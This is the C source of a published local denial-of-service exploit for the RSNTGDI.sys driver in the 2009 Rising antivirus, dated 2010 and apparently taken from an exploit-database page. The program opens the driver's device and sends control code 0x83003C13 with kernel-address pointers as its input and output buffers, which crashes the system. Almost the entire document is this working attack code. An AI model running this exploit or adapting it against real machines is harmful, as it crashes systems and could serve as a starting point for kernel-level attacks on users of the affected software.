56 lines
No EOL
1.5 KiB
C
56 lines
No EOL
1.5 KiB
C
/*
|
|
On the net.We can found these file has published a BUG.In that.The BUG has found in CONTROL CODE:0x83003C0B.So.I check these file
|
|
in othere CONTROL CODE.Just for fun.....
|
|
|
|
# Exploit Title: [Rising RSNTGDI.sys Local Denial of Service(CONTROL CODE:83003C13) ]
|
|
# Date: [2010.11.1]
|
|
# Author: [ ze0r ]
|
|
# Version: [Rising 2009.Publish Date:2009.10.13.]
|
|
# Tested on: [Windows XPSP3 Chinese Simplified & Windows 2003 Chinese Simplified]
|
|
*/
|
|
|
|
|
|
#include "stdio.h"
|
|
#include "windows.h"
|
|
|
|
HANDLE DriverHandle =0;
|
|
|
|
void boom(PVOID systembuffer,PVOID userbuffer)
|
|
{
|
|
printf("userbuffer Is:%p\n\n",userbuffer);
|
|
printf("The systembuffer Is:%p\n\n",systembuffer);
|
|
DeviceIoControl(DriverHandle,
|
|
0x83003C13,
|
|
systembuffer,
|
|
20,
|
|
userbuffer,
|
|
20,
|
|
(DWORD *)0,
|
|
0);
|
|
return ;
|
|
}
|
|
|
|
int main(int argc, char* argv[])
|
|
{
|
|
printf("-------------------------------------------------------------------------------\n");
|
|
printf("---------------------------C0ed By:ze0r,Let's ROCK!!---------------------------\n");
|
|
printf("----------------------------------QQ:289791332---------------------------------\n");
|
|
printf("-------------------------------------------------------------------------------\n\n");
|
|
DriverHandle=CreateFile("\\\\.\\rsntgdi",
|
|
0,
|
|
FILE_SHARE_READ | FILE_SHARE_WRITE ,
|
|
0,
|
|
OPEN_EXISTING,0,0);
|
|
if (DriverHandle == INVALID_HANDLE_VALUE)
|
|
{
|
|
printf("Open Driver Error!\n\n");
|
|
return 0 ;
|
|
}
|
|
|
|
printf("OK.Let's Crash It!\n\n");
|
|
getchar();
|
|
|
|
boom((PVOID)0x88888888,(PVOID)0x88888888);
|
|
|
|
return 0;
|
|
} |